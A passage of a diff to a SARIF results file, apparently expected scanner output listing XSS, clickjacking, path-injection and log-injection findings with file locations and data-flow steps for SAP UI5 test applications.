"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 29 + } + }, + "message" : { + "text" : "output: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/output}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "97b29ed20ac04ff0:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + }, + "region" : { + "startLine" : 8, + "startColumn" : 40, + "endColumn" : 63 + } + }, + "message" : { + "text" : "\"contro ... l.json\"" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 34 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "5edd24be658b61a4:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 5, + "startColumn" : 11, + "endColumn" : 32 + } + }, + "message" : { + "text" : "data-value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 34 + } + }, + "message" : { + "text" : "data-content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 5, + "startColumn" : 11, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6e0d8f690e30e24a:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endLine" : 10, + "endColumn" : 27 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 15, + "startColumn" : 5, + "endLine" : 18, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endLine" : 10, + "endColumn" : 27 + } + }, + "message" : { + "text" : "user-provided value" + } + }, { + "id" : 2, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 15, + "startColumn" : 5, + "endLine" : 18, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + }, + "region" : { + "startLine" : 9, + "startColumn" : 9, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6152b8f74a1abdf5:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + }, + "region" : { + "startLine" : 28, + "startColumn" : 34, + "endColumn" : 66 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b01bd23ca3666824:1", + "primaryLocationStartColumnFingerprint" : "25" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to missing frame options." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + }, + "region" : { + "startLine" : 2, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7fe81114896a63c:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to missing frame options." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + }, + "region" : { + "startLine" : 2, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "df700c15dad274b2:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 17, + "startColumn" : 43, + "endColumn" : 61 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "68e5ff83e2198ff5:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 17, + "startColumn" : 43, + "endColumn" : 61 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 23, + "startColumn" : 43, + "endColumn" : 55 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b79de9dff4d8f842:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 9, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 58 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 46, + "endColumn" : 59 + } + }, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 36, + "endColumn" : 60 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 21, + "endColumn" : 60 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 23, + "startColumn" : 43, + "endColumn" : 55 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 16, + "startColumn" : 39, + "endColumn" : 67 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "de27f6d546a116e8:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 16, + "startColumn" : 39, + "endColumn" : 67 + } + }, + "message" : { + "text" : "oModel. ... input')" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 8, + "startColumn" : 26, + "endColumn" : 31 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "62d5a4db56a18502:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 8, + "startColumn" : 26, + "endColumn" : 31 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 16, + "startColumn" : 26, + "endColumn" : 31 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "751ece7cb6fd18f7:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... , true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 16, + "startColumn" : 26, + "endColumn" : 31 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" } - }, - "note": { - "+": 0, - "-": 0, - "codes": {} + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + }, + "region" : { + "startLine" : 13, + "startColumn" : 38, + "endColumn" : 56 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 